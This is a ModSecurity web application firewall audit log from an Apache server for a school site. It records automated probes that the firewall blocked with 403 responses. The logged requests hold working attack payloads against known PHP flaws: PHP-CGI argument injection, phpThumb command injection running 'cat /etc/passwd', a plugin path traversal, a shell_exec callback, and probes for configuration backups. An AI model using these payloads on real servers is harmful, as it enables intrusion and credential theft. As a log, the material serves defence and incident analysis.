Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4466d710-Z-- --9a2d4546-A-- [01/May/2025:10:34:00 +0700] aBLrqCgtr0Qsi1mFAsMNfAAAAJI 103.236.140.4 44906 103.236.140.4 8181 --9a2d4546-B-- GET /config.inc.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9a2d4546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a2d4546-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070440780246 2583 (- - -) Stopwatch2: 1746070440780246 2583; combined=934, p1=417, p2=490, p3=0, p4=0, p5=27, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a2d4546-Z-- --e9d3b573-A-- [01/May/2025:10:34:05 +0700] aBLrrY144kZ4LAGlEgz3vwAAAMQ 103.236.140.4 45108 103.236.140.4 8181 --e9d3b573-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Content-Length: 42 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --e9d3b573-C-- --e9d3b573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9d3b573-E-- --e9d3b573-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||smkn22-jkt.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070445161526 3124 (- - -) Stopwatch2: 1746070445161526 3124; combined=1748, p1=425, p2=1295, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9d3b573-Z-- --53e93c50-A-- [01/May/2025:10:34:07 +0700] aBLrr4144kZ4LAGlEgz30wAAANE 103.236.140.4 45228 103.236.140.4 8181 --53e93c50-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --53e93c50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e93c50-E-- --53e93c50-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070447691176 2299 (- - -) Stopwatch2: 1746070447691176 2299; combined=631, p1=446, p2=154, p3=0, p4=0, p5=30, sr=67, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e93c50-Z-- --d9aea265-A-- [01/May/2025:10:34:12 +0700] aBLrtI144kZ4LAGlEgz34QAAANE 103.236.140.4 45452 103.236.140.4 8181 --d9aea265-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d9aea265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9aea265-E-- --d9aea265-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070452382506 2250 (- - -) Stopwatch2: 1746070452382506 2250; combined=655, p1=425, p2=202, p3=0, p4=0, p5=28, sr=60, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9aea265-Z-- --4c778041-A-- [01/May/2025:10:34:14 +0700] aBLrtsVMAgMJpNzaVtKwngAAAEQ 103.236.140.4 45560 103.236.140.4 8181 --4c778041-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4c778041-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c778041-E-- --4c778041-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070454614218 2331 (- - -) Stopwatch2: 1746070454614218 2331; combined=892, p1=553, p2=294, p3=0, p4=0, p5=45, sr=142, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c778041-Z-- --0e8cb97d-A-- [01/May/2025:10:34:16 +0700] aBLruOVeTgVPHjrSAYAT2gAAABI 103.236.140.4 45638 103.236.140.4 8181 --0e8cb97d-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0e8cb97d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e8cb97d-E-- --0e8cb97d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070456265527 2016 (- - -) Stopwatch2: 1746070456265527 2016; combined=753, p1=421, p2=280, p3=0, p4=0, p5=52, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e8cb97d-Z-- --a213246c-A-- [01/May/2025:10:34:21 +0700] aBLrvcVMAgMJpNzaVtKwtgAAAFI 103.236.140.4 45870 103.236.140.4 8181 --a213246c-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a213246c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a213246c-E-- --a213246c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461366722 2232 (- - -) Stopwatch2: 1746070461366722 2232; combined=699, p1=475, p2=192, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a213246c-Z-- --cf1cca03-A-- [01/May/2025:10:34:21 +0700] aBLrveVeTgVPHjrSAYAT7AAAAAs 103.236.140.4 45884 103.236.140.4 8181 --cf1cca03-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --cf1cca03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf1cca03-E-- --cf1cca03-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461568573 2390 (- - -) Stopwatch2: 1746070461568573 2390; combined=641, p1=453, p2=155, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf1cca03-Z-- --7056942e-A-- [01/May/2025:10:34:21 +0700] aBLrvSgtr0Qsi1mFAsMNtgAAAJE 103.236.140.4 45898 103.236.140.4 8181 --7056942e-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7056942e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7056942e-E-- --7056942e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461770381 1735 (- - -) Stopwatch2: 1746070461770381 1735; combined=582, p1=443, p2=116, p3=0, p4=0, p5=23, sr=110, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7056942e-Z-- --2bf2d741-A-- [01/May/2025:10:34:21 +0700] aBLrveVeTgVPHjrSAYAT8AAAAAo 103.236.140.4 45904 103.236.140.4 8181 --2bf2d741-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2bf2d741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf2d741-E-- --2bf2d741-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070461971807 2014 (- - -) Stopwatch2: 1746070461971807 2014; combined=540, p1=338, p2=173, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf2d741-Z-- --7fc93e62-A-- [01/May/2025:10:34:22 +0700] aBLrvuVeTgVPHjrSAYAT8gAAAAc 103.236.140.4 45914 103.236.140.4 8181 --7fc93e62-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7fc93e62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fc93e62-E-- --7fc93e62-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070462173298 1947 (- - -) Stopwatch2: 1746070462173298 1947; combined=469, p1=332, p2=110, p3=0, p4=0, p5=27, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fc93e62-Z-- --5ca2da45-A-- [01/May/2025:10:34:22 +0700] aBLrvigtr0Qsi1mFAsMNuAAAAJc 103.236.140.4 45924 103.236.140.4 8181 --5ca2da45-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5ca2da45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca2da45-E-- --5ca2da45-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070462374776 1740 (- - -) Stopwatch2: 1746070462374776 1740; combined=437, p1=308, p2=102, p3=0, p4=0, p5=26, sr=47, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca2da45-Z-- --9f84ba28-A-- [01/May/2025:10:34:22 +0700] aBLrvo144kZ4LAGlEgz3-wAAANg 103.236.140.4 45942 103.236.140.4 8181 --9f84ba28-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9f84ba28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f84ba28-E-- --9f84ba28-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070462575920 1848 (- - -) Stopwatch2: 1746070462575920 1848; combined=638, p1=468, p2=144, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f84ba28-Z-- --1dd12c18-A-- [01/May/2025:12:19:35 +0700] aBMEZygtr0Qsi1mFAsMwjQAAAJc 103.236.140.4 59972 103.236.140.4 8181 --1dd12c18-B-- GET /wp-config.php~ HTTP/1.0 Host: 